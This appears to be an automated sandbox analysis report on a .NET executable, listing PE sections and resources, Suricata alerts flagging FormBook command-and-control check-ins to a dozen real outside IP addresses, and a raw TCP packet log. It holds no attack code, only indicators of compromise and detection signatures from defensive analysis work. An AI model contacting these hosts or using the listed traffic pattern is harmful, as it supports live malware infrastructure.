IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae328	0xae400	bb72abf1608a70b2d37cb5c82854a844	False	0.9315593615494978	data	7.842658445034813	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x5b4	0x600	21b331684c0eb48fb435496eaff2fa5b	False	0.421875	data	4.08910950050373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x200	bc1b48341521749e7698edad519f2b2d	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb2090	0x324	data			0.43283582089552236
RT_MANIFEST	0xb23c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-09T16:28:46.779937+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49811	194.58.112.174	80	TCP
2024-10-09T16:29:02.461248+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49899	199.59.243.227	80	TCP
2024-10-09T16:29:05.000883+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49914	199.59.243.227	80	TCP
2024-10-09T16:29:07.549384+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49927	199.59.243.227	80	TCP
2024-10-09T16:29:10.254635+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49940	199.59.243.227	80	TCP
2024-10-09T16:29:25.320418+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49987	119.28.49.194	80	TCP
2024-10-09T16:29:27.854803+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49988	119.28.49.194	80	TCP
2024-10-09T16:29:30.474350+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49989	119.28.49.194	80	TCP
2024-10-09T16:29:32.972597+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49990	119.28.49.194	80	TCP
2024-10-09T16:29:38.892769+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49991	72.14.178.174	80	TCP
2024-10-09T16:29:41.389900+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49992	72.14.178.174	80	TCP
2024-10-09T16:29:44.111221+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49993	72.14.178.174	80	TCP
2024-10-09T16:29:46.883651+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49994	72.14.178.174	80	TCP
2024-10-09T16:29:54.002269+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49995	103.144.219.16	80	TCP
2024-10-09T16:29:56.519417+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49996	103.144.219.16	80	TCP
2024-10-09T16:29:59.090439+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49997	103.144.219.16	80	TCP
2024-10-09T16:30:01.819425+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49998	103.144.219.16	80	TCP
2024-10-09T16:30:07.648135+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49999	84.32.84.32	80	TCP
2024-10-09T16:30:10.231543+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50000	84.32.84.32	80	TCP
2024-10-09T16:30:13.068489+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50001	84.32.84.32	80	TCP
2024-10-09T16:30:15.690465+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50002	84.32.84.32	80	TCP
2024-10-09T16:30:21.682723+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50003	47.57.185.227	80	TCP
2024-10-09T16:30:24.210298+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50004	47.57.185.227	80	TCP
2024-10-09T16:30:27.050818+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50005	47.57.185.227	80	TCP
2024-10-09T16:30:29.297199+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50006	47.57.185.227	80	TCP
2024-10-09T16:30:43.890467+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	162.0.213.94	80	TCP
2024-10-09T16:30:46.614085+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50008	162.0.213.94	80	TCP
2024-10-09T16:30:48.999319+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50009	162.0.213.94	80	TCP
2024-10-09T16:30:51.514756+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50010	162.0.213.94	80	TCP
2024-10-09T16:30:58.380676+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50011	85.159.66.93	80	TCP
2024-10-09T16:31:00.927864+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50012	85.159.66.93	80	TCP
2024-10-09T16:31:03.474435+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50013	85.159.66.93	80	TCP
2024-10-09T16:31:05.186160+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50014	85.159.66.93	80	TCP
2024-10-09T16:31:10.897628+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50015	217.160.0.147	80	TCP
2024-10-09T16:31:13.437551+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50016	217.160.0.147	80	TCP
2024-10-09T16:31:16.064397+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50017	217.160.0.147	80	TCP
2024-10-09T16:31:18.543535+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50018	217.160.0.147	80	TCP
2024-10-09T16:31:32.582682+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50019	154.23.184.218	80	TCP
2024-10-09T16:31:36.236189+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50020	154.23.184.218	80	TCP
2024-10-09T16:31:38.386596+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50021	154.23.184.218	80	TCP
2024-10-09T16:31:40.913432+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50022	154.23.184.218	80	TCP
2024-10-09T16:31:47.976759+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50023	107.163.96.57	80	TCP
2024-10-09T16:31:50.682705+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50024	107.163.96.57	80	TCP
2024-10-09T16:31:53.536929+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50025	107.163.96.57	80	TCP
2024-10-09T16:31:55.139870+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50026	107.163.96.57	80	TCP
2024-10-09T16:32:02.302843+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50027	45.197.45.172	80	TCP
2024-10-09T16:32:04.856875+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50028	45.197.45.172	80	TCP
2024-10-09T16:32:07.390136+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50029	45.197.45.172	80	TCP
2024-10-09T16:32:09.957220+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50030	45.197.45.172	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 16:28:46.063695908 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.069025040 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.069204092 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.075689077 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.080564022 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779721975 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779875994 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779887915 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779901028 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779911995 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779922962 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779932976 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779937029 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.779946089 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779958963 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.779970884 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:28:46.780009031 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.780040979 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.784313917 CEST	49811	80	192.168.2.5	194.58.112.174
Oct 9, 2024 16:28:46.789205074 CEST	80	49811	194.58.112.174	192.168.2.5
Oct 9, 2024 16:29:01.993341923 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:02.000334978 CEST	80	49899	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:02.000401974 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:02.011399984 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:02.019395113 CEST	80	49899	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:02.460580111 CEST	80	49899	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:02.461174965 CEST	80	49899	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:02.461191893 CEST	80	49899	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:02.461247921 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:02.461268902 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:03.521420956 CEST	49899	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:04.539859056 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:04.545103073 CEST	80	49914	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:04.545198917 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:04.555932045 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:04.560714960 CEST	80	49914	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:05.000648975 CEST	80	49914	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:05.000684023 CEST	80	49914	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:05.000883102 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:05.001528025 CEST	80	49914	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:05.001588106 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:06.068161011 CEST	49914	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:07.086808920 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:07.091573000 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.091654062 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:07.102219105 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:07.107240915 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.107343912 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.549146891 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.549288034 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.549320936 CEST	80	49927	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:07.549384117 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:07.549415112 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:08.615118027 CEST	49927	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:09.633559942 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:09.638540030 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:09.638636112 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:09.645126104 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:09.650064945 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:10.253796101 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:10.254401922 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:10.254419088 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:10.254635096 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:10.254764080 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:10.257095098 CEST	49940	80	192.168.2.5	199.59.243.227
Oct 9, 2024 16:29:10.261918068 CEST	80	49940	199.59.243.227	192.168.2.5
Oct 9, 2024 16:29:24.420283079 CEST	49987	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:24.425879955 CEST	80	49987	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:24.426019907 CEST	49987	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:24.438149929 CEST	49987	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:24.443346977 CEST	80	49987	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:25.319991112 CEST	80	49987	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:25.320080042 CEST	80	49987	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:25.320417881 CEST	49987	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:25.943254948 CEST	49987	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:26.961728096 CEST	49988	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:26.966641903 CEST	80	49988	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:26.966726065 CEST	49988	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:26.977155924 CEST	49988	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:26.982080936 CEST	80	49988	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:27.854630947 CEST	80	49988	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:27.854753971 CEST	80	49988	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:27.854803085 CEST	49988	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:28.490447998 CEST	49988	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:29.508627892 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:29.513593912 CEST	80	49989	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:29.513679981 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:29.524072886 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:29.528964996 CEST	80	49989	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:29.529103994 CEST	80	49989	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:30.423749924 CEST	80	49989	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:30.474349976 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:30.653239012 CEST	80	49989	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:30.653300047 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:31.036889076 CEST	49989	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.055529118 CEST	49990	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.060731888 CEST	80	49990	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:32.060853004 CEST	49990	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.068690062 CEST	49990	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.073818922 CEST	80	49990	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:32.971744061 CEST	80	49990	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:32.972493887 CEST	80	49990	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:32.972596884 CEST	49990	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.974786043 CEST	49990	80	192.168.2.5	119.28.49.194
Oct 9, 2024 16:29:32.980015039 CEST	80	49990	119.28.49.194	192.168.2.5
Oct 9, 2024 16:29:38.303325891 CEST	49991	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:38.308257103 CEST	80	49991	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:38.308450937 CEST	49991	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:38.319178104 CEST	49991	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:38.324206114 CEST	80	49991	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:38.892666101 CEST	80	49991	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:38.892695904 CEST	80	49991	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:38.892704964 CEST	80	49991	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:38.892769098 CEST	49991	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:39.833796978 CEST	49991	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:40.852494001 CEST	49992	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:40.857584953 CEST	80	49992	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:40.859682083 CEST	49992	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:40.873284101 CEST	49992	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:40.878354073 CEST	80	49992	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:41.389806032 CEST	80	49992	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:41.389827013 CEST	80	49992	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:41.389899969 CEST	49992	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:42.380671024 CEST	49992	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:43.400464058 CEST	49993	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:43.585566044 CEST	80	49993	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:43.585640907 CEST	49993	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:43.603787899 CEST	49993	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:43.608683109 CEST	80	49993	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:43.609169006 CEST	80	49993	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:44.107940912 CEST	80	49993	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:44.111138105 CEST	80	49993	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:44.111221075 CEST	49993	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:45.115061045 CEST	49993	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.136451006 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.347100019 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:46.347209930 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.356448889 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.361332893 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:46.883507967 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:46.883553028 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:46.883651018 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.884160995 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:46.884200096 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.888169050 CEST	49994	80	192.168.2.5	72.14.178.174
Oct 9, 2024 16:29:46.893189907 CEST	80	49994	72.14.178.174	192.168.2.5
Oct 9, 2024 16:29:53.090411901 CEST	49995	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:53.095792055 CEST	80	49995	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:53.095941067 CEST	49995	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:53.106057882 CEST	49995	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:53.111582994 CEST	80	49995	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:53.999361038 CEST	80	49995	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:53.999541998 CEST	80	49995	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:54.002269030 CEST	49995	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:54.618545055 CEST	49995	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:55.633301020 CEST	49996	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:55.638163090 CEST	80	49996	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:55.638740063 CEST	49996	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:55.647296906 CEST	49996	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:55.652870893 CEST	80	49996	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:56.513808966 CEST	80	49996	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:56.514035940 CEST	80	49996	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:56.519417048 CEST	49996	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:57.161917925 CEST	49996	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:58.180819988 CEST	49997	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:58.185830116 CEST	80	49997	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:58.187086105 CEST	49997	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:58.196561098 CEST	49997	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:58.201572895 CEST	80	49997	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:58.201733112 CEST	80	49997	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:59.090372086 CEST	80	49997	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:59.090393066 CEST	80	49997	103.144.219.16	192.168.2.5
Oct 9, 2024 16:29:59.090439081 CEST	49997	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:29:59.712486982 CEST	49997	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:00.727447033 CEST	49998	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:00.900608063 CEST	80	49998	103.144.219.16	192.168.2.5
Oct 9, 2024 16:30:00.900675058 CEST	49998	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:00.909903049 CEST	49998	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:00.914791107 CEST	80	49998	103.144.219.16	192.168.2.5
Oct 9, 2024 16:30:01.814146042 CEST	80	49998	103.144.219.16	192.168.2.5
Oct 9, 2024 16:30:01.814351082 CEST	80	49998	103.144.219.16	192.168.2.5
Oct 9, 2024 16:30:01.819425106 CEST	49998	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:01.819425106 CEST	49998	80	192.168.2.5	103.144.219.16
Oct 9, 2024 16:30:01.824289083 CEST	80	49998	103.144.219.16	192.168.2.5
Oct 9, 2024 16:30:07.165440083 CEST	49999	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:07.171369076 CEST	80	49999	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:07.171452999 CEST	49999	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:07.186885118 CEST	49999	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:07.194390059 CEST	80	49999	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:07.648067951 CEST	80	49999	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:07.648134947 CEST	49999	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:08.696476936 CEST	49999	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:08.703061104 CEST	80	49999	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:09.740487099 CEST	50000	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:09.745683908 CEST	80	50000	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:09.752485991 CEST	50000	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:09.828490973 CEST	50000	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:09.833530903 CEST	80	50000	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:10.231462955 CEST	80	50000	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:10.231543064 CEST	50000	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:11.333853006 CEST	50000	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:11.338970900 CEST	80	50000	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:12.590142012 CEST	50001	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:12.595230103 CEST	80	50001	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:12.599239111 CEST	50001	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:12.683037996 CEST	50001	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:12.688205004 CEST	80	50001	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:12.688246012 CEST	80	50001	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:13.067970991 CEST	80	50001	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:13.068489075 CEST	50001	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:14.193444014 CEST	50001	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:14.199361086 CEST	80	50001	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.211945057 CEST	50002	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:15.217154026 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.217251062 CEST	50002	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:15.224257946 CEST	50002	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:15.229912996 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690278053 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690313101 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690330982 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690346956 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690361977 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690376997 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690392971 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690407991 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690424919 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690442085 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:15.690464973 CEST	50002	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:15.690551043 CEST	50002	80	192.168.2.5	84.32.84.32
